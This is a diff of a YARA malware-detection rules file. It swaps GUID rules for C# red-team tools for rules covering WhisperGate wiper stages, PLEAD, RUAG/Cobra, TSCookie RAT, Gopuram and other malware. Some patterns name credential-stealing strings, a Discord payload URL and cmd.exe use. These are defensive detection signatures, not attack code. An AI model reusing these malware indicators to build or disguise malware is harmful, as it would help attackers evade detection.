-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "fd1b7786-8853-5858-ab03-da350e44f738"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/slyd0g/SharpClipboard"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3537-L3551"
+		description = "Detects reversed stage3 related to Ukrainian wiper malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "d5d562cd-03ef-5450-8044-3f538cea32d0"
+		date = "2022-01-16"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/juanandres_gs/status/1482827018404257792"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_wiper_whispergate.yar#L59-L74"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f935b91fcbf982af9e67f90fe1ce9086217066dd2127dea17c92db5c185b91b9"
+		logic_hash = "b06536b6a6eebd5fb398ba2617bf68a5b2c4b0035766b3cd0fc03d95019891ec"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d"
 
 	strings:
-		$typelibguid0lo = "97484211-4726-4129-86aa-ae01d17690be" ascii wide
-		$typelibguid0up = "97484211-4726-4129-86AA-AE01D17690BE" ascii wide
+		$xc1 = { 65 31 63 70 00 31 79 72 61 72 62 69 4c 73 73 61 6c 43 00 6e 69 61 4d }
+		$s1 = "lld." wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( filesize -2 ) == 0x4d5a and filesize < 5000KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpcookiemonster : FILE
+rule SIGNATURE_BASE_MAL_OBFUSC_Unknown_Jan22_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "87be6949-f4f5-5a5a-b804-c627ed0f4355"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/m0rv4i/SharpCookieMonster"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3553-L3567"
+		description = "Detects samples similar to reversed stage3 found in Ukrainian wiper incident named WhisperGate"
+		author = "Florian Roth (Nextron Systems)"
+		id = "647c0092-b03d-5627-8568-ddaa982c73a1"
+		date = "2022-01-16"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/juanandres_gs/status/1482827018404257792"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_wiper_whispergate.yar#L76-L101"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "a4003459096d8bfdcb4c4761d32bdccfa273c3950f90c7605d555713cd215709"
+		logic_hash = "26a295d3b78c3a33d776a648aa0f410ac7cb5021ad9d3b294ff9629d6ba7132a"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9ef7dbd3da51332a78eff19146d21c82957821e464e8133e9594a07d716d892d"
 
 	strings:
-		$typelibguid0lo = "566c5556-1204-4db9-9dc8-a24091baaa8e" ascii wide
-		$typelibguid0up = "566C5556-1204-4DB9-9DC8-A24091BAAA8E" ascii wide
+		$xc1 = { 37 00 63 00 38 00 63 00 62 00 35 00 35 00 39 00
+               38 00 65 00 37 00 32 00 34 00 64 00 33 00 34 00
+               33 00 38 00 34 00 63 00 63 00 65 00 37 00 34 00
+               30 00 32 00 62 00 31 00 31 00 66 00 30 00 65 }
+		$xc2 = { 4D 61 69 6E 00 43 6C 61 73 73 4C 69 62 72 61 72
+               79 31 00 70 63 31 65 }
+		$s1 = ".dll" wide
+		$s2 = "%&%,%s%" ascii fullword
+		$op1 = { a2 87 fa b1 44 a5 f5 12 da a7 49 11 5c 8c 26 d4 75 }
+		$op2 = { d7 af 52 38 c7 47 95 c8 0e 88 f3 d5 0b }
+		$op3 = { 6c 05 df d6 b8 ac 11 f2 67 16 cb b7 34 4d b6 91 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( 1 of ( $x* ) or 3 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_P0Wnedshell : FILE
+rule SIGNATURE_BASE_MAL_Unknown_Discord_Characteristics_Jan22_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "390b94d1-dda9-5a85-80ae-c79a3f7b0b9d"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/Cn33liz/p0wnedShell"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3569-L3583"
+		description = "Detects unknown malware with a few indicators also found in Wiper malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "23ee5319-6a72-517b-8ea0-55063b6b862c"
+		date = "2022-01-16"
+		modified = "2023-12-05"
+		reference = "https://www.microsoft.com/security/blog/2022/01/15/destructive-malware-targeting-ukrainian-organizations/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ua_wiper_whispergate.yar#L103-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "bed8f4ea30218c137a26da5059934fa93316f4a3623284c5cb3a44b8bfacf7c4"
+		logic_hash = "f9cf4a15be0ab35a0d0f0c9b1a191f623f905c8fc9da651872de7c025a27a806"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "dcbbae5a1c61dbbbb7dcd6dc5dd1eb1169f5329958d38b58c3fd9384081c9b78"
 
 	strings:
-		$typelibguid0lo = "2e9b1462-f47c-48ca-9d85-004493892381" ascii wide
-		$typelibguid0up = "2E9B1462-F47C-48CA-9D85-004493892381" ascii wide
+		$x1 = "xownxloxadDxatxxax" wide
+		$s2 = "https://cdn.discordapp.com/attachments/" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpmove : FILE
+rule SIGNATURE_BASE_PLEAD_Downloader_Jun18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "e52392f9-614c-596e-8efd-aa0a2fa44e60"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/0xthirteen/SharpMove"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3585-L3599"
+		description = "Detects PLEAD Downloader"
+		author = "Florian Roth (Nextron Systems)"
+		id = "19d588d8-1f03-5f34-b82e-b645c28a19a4"
+		date = "2018-06-16"
+		modified = "2023-12-05"
+		reference = "https://blog.jpcert.or.jp/2018/06/plead-downloader-used-by-blacktech.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_plead_downloader.yar#L1-L21"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4dd05b77d8cacb0dc208ee7bdde5358adfdf0bb04f52f1d6f12774effc547ca7"
+		logic_hash = "82fa4629aeb67a657af8b40527414e59d1c45a7c4e3c68398d3472c080c9487b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "a26df4f62ada084a596bf0f603691bc9c02024be98abec4a9872f0ff0085f940"
 
 	strings:
-		$typelibguid0lo = "8bf82bbe-909c-4777-a2fc-ea7c070ff43e" ascii wide
-		$typelibguid0up = "8BF82BBE-909C-4777-A2FC-EA7C070FF43E" ascii wide
+		$s1 = "%02d:%02d:%02d" ascii fullword
+		$s2 = "%02d-%02d-%02d" ascii fullword
+		$s3 = "1111%02d%02d%02d_%02d%02d2222" ascii fullword
+		$a1 = "Scanning..." wide fullword
+		$a2 = "Checking..." wide fullword
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 200KB and ( all of ( $s* ) or ( 2 of ( $s* ) and 1 of ( $a* ) ) )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_C_Sharp_R_A_T_Client : FILE
+rule SIGNATURE_BASE_RUAG_Tavdig_Malformed_Executable : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "f5df8257-d202-58e3-9c4a-1dfc9dd52f2a"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/AdvancedHacker101/C-Sharp-R.A.T-Client"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3601-L3615"
+		description = "Detects an embedded executable with a malformed header - known from Tavdig malware"
+		author = "Florian Roth (Nextron Systems)"
+		id = "da6357d4-0cdb-5f30-9919-59858963cc41"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/N5MEj0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ruag.yar#L9-L19"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "5e6a9db731caf7bc7ab79fa70c3f9bacaca8fa2d70deafe2a0b08ae4fac8a35b"
-		score = 75
+		logic_hash = "2a6eb90cc77f4556da0b5b0211bf0c4759dae0d78e9c6b765eff0e9a34f52e0f"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-
-	strings:
-		$typelibguid0lo = "6d9e8852-e86c-4e36-9cb4-b3c3853ed6b8" ascii wide
-		$typelibguid0up = "6D9E8852-E86C-4E36-9CB4-B3C3853ED6B8" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and uint32( uint32( 0x3C ) ) == 0x0000AD0B
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpprinter : FILE
+rule SIGNATURE_BASE_RUAG_Bot_Config_File : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "10270351-ad80-5330-971b-bc8f635f05f4"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/rvrsh3ll/SharpPrinter"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3617-L3631"
+		description = "Detects a specific config file used by malware in RUAG APT case"
+		author = "Florian Roth (Nextron Systems)"
+		id = "aa3d5f9e-0b23-5180-9e52-a7d705712747"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/N5MEj0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ruag.yar#L21-L34"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "db7f131fa38756d53681792f3de2af44ace768e66c5318f61fa199900a8cdb8e"
-		score = 75
+		logic_hash = "256808511233da446ec69db4f5a5e23a237296c100e79e78bbe5e4964fa5dde6"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "41b2d1e5-4c5d-444c-aa47-629955401ed9" ascii wide
-		$typelibguid0up = "41B2D1E5-4C5D-444C-AA47-629955401ED9" ascii wide
+		$s1 = "[CONFIG]" ascii
+		$s2 = "name = " ascii
+		$s3 = "exe = cmd.exe" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32( 0 ) == 0x4e4f435b and $s1 at 0 and $s2 and $s3 and filesize < 160
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Evilfoca : FILE
+rule SIGNATURE_BASE_RUAG_Cobra_Malware : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "2b2f5f6f-4224-5013-9e85-0ac088826bea"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/ElevenPaths/EvilFOCA"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3633-L3647"
+		description = "Detects a malware mentioned in the RUAG Case called Carbon/Cobra"
+		author = "Florian Roth (Nextron Systems)"
+		id = "dd2d591f-6f56-5c31-9f3c-3aa7d174c9a0"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/N5MEj0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ruag.yar#L36-L47"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "d3302781414e5146ee8b5d7d2df8aa5d4be31308b7483200eb695e0c0048c279"
-		score = 75
+		logic_hash = "5576e8e465eb289e8da44009cb2237080c5b5c3eb6d7a337634d91c5d68ecd80"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "f26bdb4a-5846-4bec-8f52-3c39d32df495" ascii wide
-		$typelibguid0up = "F26BDB4A-5846-4BEC-8F52-3C39D32DF495" ascii wide
+		$s1 = "\\Cobra\\Release\\Cobra.pdb" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and $s1
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Poshc2_Misc : FILE
+rule SIGNATURE_BASE_RUAG_Cobra_Config_File : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "245803cb-63d8-5c75-b672-912091cf4a80"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/nettitude/PoshC2_Misc"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3649-L3665"
+		description = "Detects a config text file used by malware Cobra in RUAG case"
+		author = "Florian Roth (Nextron Systems)"
+		id = "b3899d95-acc9-55ca-9025-edecce755ca6"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/N5MEj0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ruag.yar#L49-L71"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b6cabc8a50db469162024b13df8d69f57ca5ec008bddc647aee2a73dff9942c8"
-		score = 75
+		logic_hash = "703a89562f3a2e5692883892f468288276459ad528cd371b1ac226e1d1c4be02"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "85773eb7-b159-45fe-96cd-11bad51da6de" ascii wide
-		$typelibguid0up = "85773EB7-B159-45FE-96CD-11BAD51DA6DE" ascii wide
-		$typelibguid1lo = "9d32ad59-4093-420d-b45c-5fff391e990d" ascii wide
-		$typelibguid1up = "9D32AD59-4093-420D-B45C-5FFF391E990D" ascii wide
+		$h1 = "[NAME]" ascii
+		$s1 = "object_id=" ascii
+		$s2 = "[TIME]" ascii fullword
+		$s3 = "lastconnect" ascii
+		$s4 = "[CW_LOCAL]" ascii fullword
+		$s5 = "system_pipe" ascii
+		$s6 = "user_pipe" ascii
+		$s7 = "[TRANSPORT]" ascii
+		$s8 = "run_task_system" ascii
+		$s9 = "[WORKDATA]" ascii
+		$s10 = "address1" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32( 0 ) == 0x4d414e5b and $h1 at 0 and 8 of ( $s* ) and filesize < 5KB
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharpire : FILE
+rule SIGNATURE_BASE_RUAG_Exfil_Config_File : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "32bdaa0f-3afc-5e0e-a20f-e21f33909af7"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/0xbadjuju/Sharpire"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3667-L3681"
+		description = "Detects a config text file used in data exfiltration in RUAG case"
+		author = "Florian Roth (Nextron Systems)"
+		id = "7057bc7b-7f8c-5db8-b7f3-f6c33487b122"
+		date = "2023-12-05"
+		modified = "2023-12-05"
+		reference = "https://goo.gl/N5MEj0"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_ruag.yar#L73-L90"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "f8ddf85c279c6ea4a2db679a0d5c816837e8bd91f1f6e15787dd34463483fc85"
-		score = 75
+		logic_hash = "379e8762932ca565f3bd35ec241aef2d0445fbe6182a041e4d4e16a1170202ef"
+		score = 60
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "39b75120-07fe-4833-a02e-579ff8b68331" ascii wide
-		$typelibguid0up = "39B75120-07FE-4833-A02E-579FF8B68331" ascii wide
+		$h1 = "[TRANSPORT]" ascii
+		$s1 = "system_pipe" ascii
+		$s2 = "spstatus" ascii
+		$s3 = "adaptable" ascii
+		$s4 = "post_frag" ascii
+		$s5 = "pfsgrowperiod" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint32( 0 ) == 0x4152545b and $h1 at 0 and all of ( $s* ) and filesize < 1KB
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Sharp_Smbexec : FILE
+
+rule SIGNATURE_BASE_Tscookie_RAT : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "6a1024af-734c-5974-af50-db51dbd694ff"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/checkymander/Sharp-SMBExec"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3683-L3697"
+		description = "Detects TSCookie RAT"
+		author = "Florian Roth (Nextron Systems)"
+		id = "a2b6c598-4498-5c0a-9257-b0bf6cd28de9"
+		date = "2018-03-06"
+		modified = "2023-12-05"
+		reference = "http://blog.jpcert.or.jp/2018/03/malware-tscooki-7aa0.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_tscookie_rat.yar#L13-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e9e248c4ac359a098f1ef26dc300e38836f070545db182a0b72a6eaf9bf003da"
+		logic_hash = "c6121c541a77219b17351787973a4bc06a8d941ebd5f9e5e1e14ad4740a3fe7b"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "2bd13d63797864a70b775bd1994016f5052dc8fd1fd83ce1c13234b5d304330d"
 
 	strings:
-		$typelibguid0lo = "344ee55a-4e32-46f2-a003-69ad52b55945" ascii wide
-		$typelibguid0up = "344EE55A-4E32-46F2-A003-69AD52B55945" ascii wide
+		$x1 = "[-] DecryptPassword_Outlook failed(err=%d)" fullword ascii
+		$x2 = "----------------------- Firefox Passwords ------------------" fullword ascii
+		$x3 = "--------------- Outlook Passwords ------------------" fullword ascii
+		$x4 = "----------------------- IE Passwords ------------------" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( ( pe.exports ( "DoWork" ) and pe.exports ( "PrintF" ) ) or 1 of them )
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Misctools : FILE
+rule SIGNATURE_BASE_MAL_Gopuram_Apr23 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
+		description = "Detects Lazarus Gopuram malware"
 		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "ce49cc7b-a5a5-52b7-a7bf-bbb0c5b29b8a"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/rasta-mouse/MiscTools"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3699-L3721"
+		id = "e0bb43b0-542b-5c8e-bcba-0326f80efaa0"
+		date = "2023-04-04"
+		modified = "2023-12-05"
+		reference = "https://securelist.com/gopuram-backdoor-deployed-through-3cx-supply-chain-attack/109344/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_lazarus_gopuram.yar#L1-L16"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "551c11eb44007cefd7e588fa97659cea44cf64b32a2e061aab425aa4a67583ef"
+		hash = "beb775af5196f30e0ee021790a4978ca7a7ac2a7cf970a5a620ffeb89cc60b2c"
+		hash = "97b95b4a5461f950e712b82783930cb2a152ec0288c00a977983ca7788342df7"
+		logic_hash = "58d978bd09a656f2a10a4d5d2585e51efe5cfb6b6648a4b3c2ce8c4f5d2256d4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		license = "Detection Rule License 1.1 https://github.com/SigmaHQ/Detection-Rule-License"
 
 	strings:
-		$typelibguid0lo = "384e9647-28a9-4835-8fa7-2472b1acedc0" ascii wide
-		$typelibguid0up = "384E9647-28A9-4835-8FA7-2472B1ACEDC0" ascii wide
-		$typelibguid1lo = "d7ec0ef5-157c-4533-bbcd-0fe070fbf8d9" ascii wide
-		$typelibguid1up = "D7EC0EF5-157C-4533-BBCD-0FE070FBF8D9" ascii wide
-		$typelibguid2lo = "10085d98-48b9-42a8-b15b-cb27a243761b" ascii wide
-		$typelibguid2up = "10085D98-48B9-42A8-B15B-CB27A243761B" ascii wide
-		$typelibguid3lo = "6aacd159-f4e7-4632-bad1-2ae8526a9633" ascii wide
-		$typelibguid3up = "6AACD159-F4E7-4632-BAD1-2AE8526A9633" ascii wide
-		$typelibguid4lo = "49a6719e-11a8-46e6-ad7a-1db1be9fea37" ascii wide
-		$typelibguid4up = "49A6719E-11A8-46E6-AD7A-1DB1BE9FEA37" ascii wide
+		$path = "%s.TxR.0.regtrans-ms"
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5A4D and $path and filesize < 10MB
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Memorymapper : FILE
+rule SIGNATURE_BASE_Scarcruft_Malware_Feb18_1 : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "c978be10-315c-54e7-afea-f97e9a5f2d18"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/jasondrawdy/MemoryMapper"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3723-L3737"
+		description = "Detects Scarcruft malware - February 2018"
+		author = "Florian rootpath"
+		id = "43a87f2a-cf60-5035-8d40-c360a789a1ac"
+		date = "2018-02-03"
+		modified = "2023-12-05"
+		reference = "https://twitter.com/craiu/status/959477129795731458"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_scarcruft.yar#L2-L15"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "ccdb8501b0f26aca352a13d5337d64c2eccff695bd052bd10bcd324c62c931e5"
-		score = 75
+		logic_hash = "fa1ed130518a2096bd731dce917512d560160e271ad8f0ccd57fbedd478a5502"
+		score = 90
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
 
 	strings:
-		$typelibguid0lo = "b9fbf3ac-05d8-4cd5-9694-b224d4e6c0ea" ascii wide
-		$typelibguid0up = "B9FBF3AC-05D8-4CD5-9694-B224D4E6C0EA" ascii wide
+		$x1 = "d:\\HighSchool\\version 13\\2ndBD\\T+M\\" ascii
+		$x2 = "cmd.exe /C ping 0.1.1.2" wide
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 2000KB and 1 of them
 }
-rule SIGNATURE_BASE_HKTL_NET_GUID_Vanillarat : FILE
+rule SIGNATURE_BASE_Furtim_Nativedll : FILE
 {
 	meta:
-		description = "Detects c# red/black-team tools via typelibguid"
-		author = "Arnim Rupp (https://github.com/ruppde)"
-		id = "9448e8d0-5bfc-5683-b633-284e43d24642"
-		date = "2020-12-28"
-		modified = "2023-04-06"
-		reference = "https://github.com/DannyTheSloth/VanillaRAT"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_github_net_redteam_tools_guids.yar#L3739-L3755"
+		description = "Detects Furtim malware - file native.dll"
+		author = "Florian Roth (Nextron Systems)"
+		id = "4639b637-55d3-5591-9278-5a21de23ac72"
+		date = "2016-06-13"
+		modified = "2023-12-05"
+		reference = "MISP 3971"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_furtim.yar#L8-L25"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "4241cbbf7cde175b6dfd27b59123e5e324f4356184dae07529dd021c0f3dbea9"
+		logic_hash = "f9673cdd1e8e38f98b9625291a03011d5cfce78c689eab491ff189c4e039e1ef"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "4f39d3e70ed1278d5fa83ed9f148ca92383ec662ac34635f7e56cc42eeaee948"
 
 	strings:
-		$typelibguid0lo = "d0f2ee67-0a50-423d-bfe6-845da892a2db" ascii wide
-		$typelibguid0up = "D0F2EE67-0A50-423D-BFE6-845DA892A2DB" ascii wide
-		$typelibguid1lo = "a593fcd2-c8ab-45f6-9aeb-8ab5e20ab402" ascii wide
-		$typelibguid1up = "A593FCD2-C8AB-45F6-9AEB-8AB5E20AB402" ascii wide
+		$s1 = "FqkVpTvBwTrhPFjfFF6ZQRK44hHl26" fullword ascii
+		$op0 = { e0 b3 42 00 c7 84 24 ac }
+		$op1 = { a1 e0 79 44 00 56 ff 90 10 01 00 00 a1 e0 79 44 }
+		$op2 = { bf d0 25 44 00 57 89 4d f0 ff 90 d4 02 00 00 59 }
 
 	condition:
-		( uint16( 0 ) == 0x5A4D and uint32( uint32( 0x3C ) ) == 0x00004550 ) and any of them
+		uint16( 0 ) == 0x5a4d and filesize < 900KB and $s1 or all of ( $op* )
 }
